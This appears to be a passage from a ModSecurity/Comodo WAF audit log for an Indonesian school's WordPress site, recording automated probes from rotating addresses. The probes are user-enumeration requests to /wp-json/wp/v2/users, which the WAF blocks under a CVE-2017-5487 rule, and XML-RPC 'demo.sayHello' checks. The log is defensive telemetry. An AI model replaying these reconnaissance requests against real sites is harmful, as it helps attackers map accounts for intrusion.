"CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426047262055 3263 (- - -) Stopwatch2: 1747426047262055 3263; combined=1420, p1=508, p2=878, p3=0, p4=0, p5=34, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a792983a-Z-- --3876a45b-A-- [17/May/2025:03:07:33 +0700] aCebBdhEtho3ciA0wehecQAAAIM 103.236.140.4 54650 103.236.140.4 8181 --3876a45b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.89.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.89.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3876a45b-C-- demo.sayHello --3876a45b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3876a45b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426053096967 4536 (- - -) Stopwatch2: 1747426053096967 4536; combined=3561, p1=446, p2=2915, p3=23, p4=26, p5=90, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3876a45b-Z-- --1639506d-A-- [17/May/2025:03:07:49 +0700] aCebFde6THFz1hsaJaLZQgAAAAU 103.236.140.4 54666 103.236.140.4 8181 --1639506d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1639506d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1639506d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426069458935 3247 (- - -) Stopwatch2: 1747426069458935 3247; combined=1417, p1=504, p2=881, p3=0, p4=0, p5=32, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1639506d-Z-- --90b6253c-A-- [17/May/2025:03:07:55 +0700] aCebG9hEtho3ciA0wehedAAAAIk 103.236.140.4 54672 103.236.140.4 8181 --90b6253c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --90b6253c-C-- demo.sayHello --90b6253c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --90b6253c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426075467498 4765 (- - -) Stopwatch2: 1747426075467498 4765; combined=3673, p1=418, p2=3045, p3=29, p4=24, p5=91, sr=65, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90b6253c-Z-- --40657a3b-A-- [17/May/2025:03:08:07 +0700] aCebJ9e6THFz1hsaJaLZQwAAAA4 103.236.140.4 54696 103.236.140.4 8181 --40657a3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40657a3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40657a3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426087453571 3556 (- - -) Stopwatch2: 1747426087453571 3556; combined=1448, p1=503, p2=912, p3=0, p4=0, p5=32, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40657a3b-Z-- --6701ef05-A-- [17/May/2025:03:08:08 +0700] aCebKNhEtho3ciA0wehedgAAAI4 103.236.140.4 54698 103.236.140.4 8181 --6701ef05-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6701ef05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6701ef05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426088993211 2513 (- - -) Stopwatch2: 1747426088993211 2513; combined=1138, p1=387, p2=722, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6701ef05-Z-- --0eb29052-A-- [17/May/2025:03:08:13 +0700] aCebLce47ocjCGWTS4Y_GwAAAFE 103.236.140.4 54704 103.236.140.4 8181 --0eb29052-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.32 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0eb29052-C-- demo.sayHello --0eb29052-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eb29052-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426093752742 4596 (- - -) Stopwatch2: 1747426093752742 4596; combined=3606, p1=431, p2=2976, p3=23, p4=27, p5=88, sr=67, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eb29052-Z-- --3fe14f49-A-- [17/May/2025:03:08:14 +0700] aCebLse47ocjCGWTS4Y_HAAAAEM 103.236.140.4 54706 103.236.140.4 8181 --3fe14f49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3fe14f49-C-- demo.sayHello --3fe14f49-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fe14f49-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426094071094 4573 (- - -) Stopwatch2: 1747426094071094 4573; combined=3652, p1=444, p2=2993, p3=22, p4=25, p5=98, sr=93, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fe14f49-Z-- --e5d8ba56-A-- [17/May/2025:03:08:15 +0700] aCebL9e6THFz1hsaJaLZRAAAAAY 103.236.140.4 54708 103.236.140.4 8181 --e5d8ba56-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e5d8ba56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5d8ba56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426095345924 2686 (- - -) Stopwatch2: 1747426095345924 2686; combined=1212, p1=450, p2=733, p3=0, p4=0, p5=29, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5d8ba56-Z-- --818fe848-A-- [17/May/2025:03:08:21 +0700] aCebNce47ocjCGWTS4Y_HwAAAFU 103.236.140.4 54716 103.236.140.4 8181 --818fe848-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.154 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --818fe848-C-- demo.sayHello --818fe848-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --818fe848-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426101199765 6671 (- - -) Stopwatch2: 1747426101199765 6671; combined=4720, p1=619, p2=3847, p3=41, p4=42, p5=101, sr=79, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --818fe848-Z-- --3909e953-A-- [17/May/2025:03:08:22 +0700] aCebNse47ocjCGWTS4Y_IAAAAFY 103.236.140.4 54718 103.236.140.4 8181 --3909e953-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3909e953-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3909e953-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426102398429 2324 (- - -) Stopwatch2: 1747426102398429 2324; combined=1084, p1=339, p2=712, p3=0, p4=0, p5=32, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3909e953-Z-- --e83a1448-A-- [17/May/2025:03:08:27 +0700] aCebO8e47ocjCGWTS4Y_IgAAAFg 103.236.140.4 54724 103.236.140.4 8181 --e83a1448-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.163 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e83a1448-C-- demo.sayHello --e83a1448-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e83a1448-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426107536727 5229 (- - -) Stopwatch2: 1747426107536727 5229; combined=3923, p1=510, p2=3205, p3=27, p4=23, p5=92, sr=67, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e83a1448-Z-- --fd2bd514-A-- [17/May/2025:03:08:58 +0700] aCebWse47ocjCGWTS4Y_JAAAAEE 103.236.140.4 54728 103.236.140.4 8181 --fd2bd514-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fd2bd514-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd2bd514-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426138418806 3093 (- - -) Stopwatch2: 1747426138418806 3093; combined=1344, p1=455, p2=854, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd2bd514-Z-- --dc5c7226-A-- [17/May/2025:03:09:05 +0700] aCebYce47ocjCGWTS4Y_JgAAAEQ 103.236.140.4 54732 103.236.140.4 8181 --dc5c7226-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.124 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc5c7226-C-- demo.sayHello --dc5c7226-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc5c7226-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426145325525 6343 (- - -) Stopwatch2: 1747426145325525 6343; combined=4594, p1=568, p2=3689, p3=91, p4=38, p5=123, sr=82, sw=85, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc5c7226-Z-- --6a2cbd60-A-- [17/May/2025:03:09:36 +0700] aCebgMe47ocjCGWTS4Y_KAAAAEw 103.236.140.4 54736 103.236.140.4 8181 --6a2cbd60-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6a2cbd60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a2cbd60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426176808301 2833 (- - -) Stopwatch2: 1747426176808301 2833; combined=1271, p1=427, p2=815, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a2cbd60-Z-- --95145d4c-A-- [17/May/2025:03:09:42 +0700] aCebhse47ocjCGWTS4Y_KgAAAE0 103.236.140.4 54742 103.236.140.4 8181 --95145d4c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --95145d4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95145d4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747426182132192 2927 (- - -) Stopwatch2: 1747426182132192 2927; combined=1362, p1=416, p2=913, p3=0, p4=0, p5=33, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95145d4c-Z-- --0810bb53-A-- [17/May/2025:03:09:42 +0700] aCebhse47ocjCGWTS4Y_KQAAAEY 103.236.140.4 54740 103.236.140.4 8181 --0810bb53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0810bb53-C-- demo.sayHello --0810bb53-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0810bb53-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747426182129179 6618 (- - -) Stopwatch2: 1747426182129179 6618; combined=5116, p1=539, p2=4357, p3=36, p4=33, p5=89, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0810bb53-Z-- --1beef61c-A-- [17/May/2025:03:09:46 +0700] aCebise47ocjCGWTS4Y_KwAAAFA 103.236.140.4 54748 103.236.140.4 8181 --1beef61c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1beef61c-C-- demo.sayHello --1beef61c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1beef61c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file 